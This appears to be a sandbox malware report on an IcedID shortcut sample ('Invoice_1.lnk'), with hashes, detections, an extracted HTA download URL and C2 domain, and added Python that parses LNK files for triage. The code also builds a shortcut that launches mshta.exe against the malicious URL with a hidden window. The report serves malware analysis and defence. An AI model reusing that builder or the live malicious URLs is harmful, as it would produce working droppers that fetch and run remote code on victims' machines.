General

Target: a0fa7f6e03e5d3fa5adfcd5dc1e85354-sample.zip
Size: 1KB
Sample: 220525-xy9rdacee9
MD5: a3cdbef698dbf2dc5dfc4901ce8b09a5
SHA1: b4a3f0d41a5f8baab16d298aecc0c4fcf7eec051
SHA256: 9646b87a32e3a271b4e36a73a8b9d1742035a0edbcdb11b00f85e3e13178a597
SHA512: 8c6d0212c30fabc312aafffb7dcc9d9f6a33d8d774020c63fd17174334d433730541faf04d5bfce701e5d8e69d4d68a2aa20ac495f2f4ce3edc3980c0c381876
Static task: static1
Behavioral task: behavioral1
Sample: Invoice_1.lnk
Resource: win7-20220414-en
Malware Config

Extracted URL: https://conderadio.tv/09872574.hta
Extracted config: icedid (campaign ID 109932505, C2 domain ilekvoyn.com)
Targets

Target: Invoice_1.lnk
Size: 2KB
MD5: c00c67f3de031c5ae198ba0362b5dd01
SHA1: 40f3b0263f8fccdf1fd5fe287dbd55829a8eddd6
SHA256: d146c8bc52ec74b67704b30c0fb20995ba65770d191502f70c88c262dc44fc5d
SHA512: 4944aa5947667500eddb4d7fed5b0a8eb4d14db1d60496fcbe38c4032511b04c92757807a23dff49353f5ee75a5ed44cc5de9ed7cdcd12b59a7b8c9214e227ad
suricata: ET MALWARE Win32/IcedID Request Cookie
Blocklisted process makes network request
Downloads MZ/PE file
Checks computer location settings: looks up the country code configured in the registry (on Windows the per-user value is Nation under HKCU\Control Panel\International\Geo), likely a geofence check that decides whether the payload runs on this host.
Loads dropped DLL
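The sample is a 2KB shortcut, and the report's config extractor recovered an HTA URL from it. The quickest static triage for an LNK is to parse its StringData (relative path, working directory, command-line arguments) and grep the result for URLs, which is what the following added example does with a minimal MS-SHLLINK reader. This is example code, not the sandbox's extractor. It builds its own sample LNK in memory (labelled constructed in the code): the mshta.exe launch with the URL as its argument is an assumption, since the report does not show the real Invoice_1.lnk's command line; the URL is the one the report extracted.

```python
import re
import struct

# Constants from MS-SHLLINK (Shell Link Binary File Format), section 2.1.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}, LE

# LinkFlags bits (section 2.1.1) that decide which optional structures follow the header.
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields (section 2.4), in the order they appear in the file.
STRING_DATA_FIELDS = (
    ("name", HAS_NAME),
    ("relative_path", HAS_RELATIVE_PATH),
    ("working_dir", HAS_WORKING_DIR),
    ("arguments", HAS_ARGUMENTS),
    ("icon_location", HAS_ICON_LOCATION),
)

URL_RE = re.compile(r"(?:https?|ftp)://[^\s\"'<>]+", re.IGNORECASE)


def _need(data: bytes, off: int, n: int) -> None:
    """Fail loudly on a truncated file instead of reading past its end."""
    if off + n > len(data):
        raise ValueError(f"truncated LNK: need {n} bytes at offset {off}, have {len(data)}")


def parse_lnk(data: bytes) -> dict:
    """Return ShowCommand and every StringData field present in a .lnk."""
    _need(data, 0, LNK_HEADER_SIZE)
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != LNK_HEADER_SIZE or clsid != LNK_CLSID:
        raise ValueError("not a Shell Link: bad HeaderSize or LinkCLSID")
    (show_command,) = struct.unpack_from("<I", data, 60)  # SW_* value used to launch the target
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:  # 2-byte IDListSize, then that many bytes of ItemIDs
        _need(data, off, 2)
        (idlist_size,) = struct.unpack_from("<H", data, off)
        off += 2 + idlist_size
    if flags & HAS_LINK_INFO:  # 4-byte LinkInfoSize counts itself, so skip exactly that much
        _need(data, off, 4)
        (linkinfo_size,) = struct.unpack_from("<I", data, off)
        off += linkinfo_size
    result = {"flags": flags, "show_command": show_command}
    for field, bit in STRING_DATA_FIELDS:
        if not flags & bit:
            continue
        _need(data, off, 2)
        (count,) = struct.unpack_from("<H", data, off)  # CountCharacters, not bytes
        off += 2
        width = 2 if flags & IS_UNICODE else 1
        _need(data, off, count * width)
        raw = data[off:off + count * width]
        off += count * width
        result[field] = raw.decode("utf-16-le" if width == 2 else "cp1252", "replace")
    return result


def extract_urls(parsed: dict) -> list[str]:
    """Pull URLs out of every string field, in file order."""
    urls = []
    for field, _ in STRING_DATA_FIELDS:
        urls.extend(URL_RE.findall(parsed.get(field, "")))
    return urls


def build_lnk(relative_path: str, arguments: str, show_command: int = 7, unicode: bool = True) -> bytes:
    """Build a minimal, structurally valid .lnk: header plus two StringData fields.
    Only used to construct an offline sample; real shortcuts carry more structures."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | (IS_UNICODE if unicode else 0)
    header = struct.pack(
        "<I16sIIQQQIIIHHII",
        LNK_HEADER_SIZE, LNK_CLSID, flags,
        0x80,          # FileAttributes: FILE_ATTRIBUTE_NORMAL
        0, 0, 0,       # CreationTime, AccessTime, WriteTime
        0, 0,          # FileSize, IconIndex
        show_command,  # 7 = SW_SHOWMINNOACTIVE, a common choice to keep the window out of sight
        0, 0, 0, 0,    # HotKey, Reserved1, Reserved2, Reserved3
    )

    def string_data(text: str) -> bytes:
        encoded = text.encode("utf-16-le") if unicode else text.encode("cp1252")
        return struct.pack("<H", len(text)) + encoded

    return header + string_data(relative_path) + string_data(arguments)


# Constructed sample, not the real Invoice_1.lnk: the relative path points at mshta.exe
# (an assumption) and the arguments carry the HTA URL the report extracted.
SAMPLE_LNK = build_lnk(r"..\..\..\Windows\System32\mshta.exe", "https://conderadio.tv/09872574.hta")


def triage(data: bytes) -> dict:
    """One-shot triage: launch target, arguments, window state and URLs worth blocking."""
    parsed = parse_lnk(data)
    return {
        "target": parsed.get("relative_path"),
        "arguments": parsed.get("arguments"),
        "show_command": parsed["show_command"],
        "urls": extract_urls(parsed),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_LNK))
```

Run it against a real shortcut with `triage(open("Invoice_1.lnk", "rb").read())`; the same reader also exposes a ShowCommand of 7 or 0, which is worth flagging on its own because a legitimate document shortcut rarely needs to hide its window.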